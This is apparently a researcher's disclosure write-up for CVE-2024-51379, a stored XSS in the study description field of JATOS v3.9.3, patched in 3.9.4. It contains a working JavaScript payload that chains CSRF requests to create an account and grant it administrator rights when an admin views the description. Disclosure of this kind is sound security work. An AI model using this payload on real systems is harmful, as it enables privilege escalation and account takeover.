CVE-2024–51379 | JATOS v3.9.3 Stored XSS | Description Component
Introduction to CVE-2024–51379
CVE-2024–51379 highlights a critical security vulnerability within the application that poses significant risks to user data and system integrity. This Stored XSS (Cross-Site Scripting) flaw enables an attacker to execute JavaScript in a user’s browser, leading to unauthorized actions and account takeover.
What is JATOS
JATOS is a powerful web-based platform designed to conduct psychological experiments and surveys online. It enables researchers to create, distribute, and gather data from participants in a controlled environment, making it a versatile tool in the field of psychological research.
The platform boasts a user-friendly interface that allows researchers to set up experiments without requiring extensive programming knowledge, making it accessible to a broader audience. Additionally, JATOS supports multi-platform usage, enabling experiments to be run on various devices, including computers, tablets, and smartphones, which significantly expands participant reach.
One of the standout features of JATOS is its real-time data collection capability, which allows researchers to gather and analyze results efficiently. It also offers integration with other tools and platforms, providing flexibility in experimental design. As an open-source software, JATOS allows researchers to customize the platform according to their specific needs, further enhancing its utility.
JATOS was developed by Kristian Lange and Elisa Filevich, who aimed to create an effective solution for online research. Speaking with Kristian, he made me understand that he is currently the only developer still maintaining JATOS. This is particularly impressive given the extensive capabilities of the platform and the demands of ongoing development and support. It’s an amazing achievement for a solo developer to sustain such a robust and widely used tool in the research community.
I want to highlight that, thanks to the excellent collaboration with Kristian, the issues identified in this blog article have been successfully patched in version 3.9.4.
Exploitation Phase
Now that you clearly understand what JATOS is, let’s delve deeper into the specifics of this CVE and explore how an attacker might exploit it. We will begin by demonstrating a straightforward vulnerability and then illustrate a relevant use case in which an attacker could leverage this vulnerability against an administrator to gain elevated privileges.
Simple Exploitation
To exploit the Stored XSS vulnerability in the description component of the study section, simply input <script>alert(1)</script>
. Although the description field is designed to allow Markdown, it should not permit the execution of JavaScript. This is crucial because if a study containing such a payload is assigned to an admin, the admin could click on the description, unintentionally executing JavaScript written by a user in their browser.
A strong recommendation to address this issue is to sanitize the output. Once the input text is converted into fully rendered HTML, you can effectively apply the appropriate XSS filters to eliminate dangerous or malicious content. (More Information)
Attacker Scenario Exploiting the Vulnerability
This vulnerability could be exploited in conjunction with CVE #3 | JATOS v3.9.3 CSRF | Admin Account Creation, enabling a regular user to create a new admin account.
To achieve this, the user would first create a new study, add the administrator, and then include the following JavaScript snippet in the description section:
<script>
function postRequestInIframe() {
var form = document.createElement('form');
form.method = 'POST';
form.action = 'http://localhost:9000/jatos/user';
form.target = 'postIframe';
var usernameInput = document.createElement('input');
usernameInput.type = 'hidden';
usernameInput.name = 'username';
usernameInput.value = 'Hacked';
form.appendChild(usernameInput);
var nameInput = document.createElement('input');
nameInput.type = 'hidden';
nameInput.name = 'name';
nameInput.value = 'name123';
form.appendChild(nameInput);
var emailInput = document.createElement('input');
emailInput.type = 'hidden';
emailInput.name = 'email';
emailInput.value = 'email@gmail.com';
form.appendChild(emailInput);
var authByLdapInput = document.createElement('input');
authByLdapInput.type = 'hidden';
authByLdapInput.name = 'authByLdap';
authByLdapInput.value = 'false';
form.appendChild(authByLdapInput);
var passwordInput = document.createElement('input');
passwordInput.type = 'hidden';
passwordInput.name = 'password';
passwordInput.value = 'password123';
form.appendChild(passwordInput);
document.body.appendChild(form);
form.submit();
document.body.removeChild(form);
}
// Trigger the first request immediately
postRequestInIframe();
// Wait 3 seconds and trigger the second request
setTimeout(function postRequestInIframeaftertimeout() {
var form = document.createElement('form');
form.method = 'POST';
form.action = 'http://localhost:9000/jatos/user/hacked/properties/role?role=ADMIN&value=true';
form.target = 'postIframetimeout';
document.body.appendChild(form);
form.submit();
document.body.removeChild(form);
}, 3000); // Executes after 3000ms (3 seconds)
</script>
When the administrator clicks on the description section of this study, two actions occur: first, a CSRF attack is executed to create a new user; second, another CSRF request is sent to grant that user administrative privileges.
This would enable the attacker to log in with the new account as an administrator, compromising the integrity, confidentiality, and availability of the application, particularly if any studies are removed.
Other References
For the latest updates on my developments and research, be sure to check out my GitHub profile.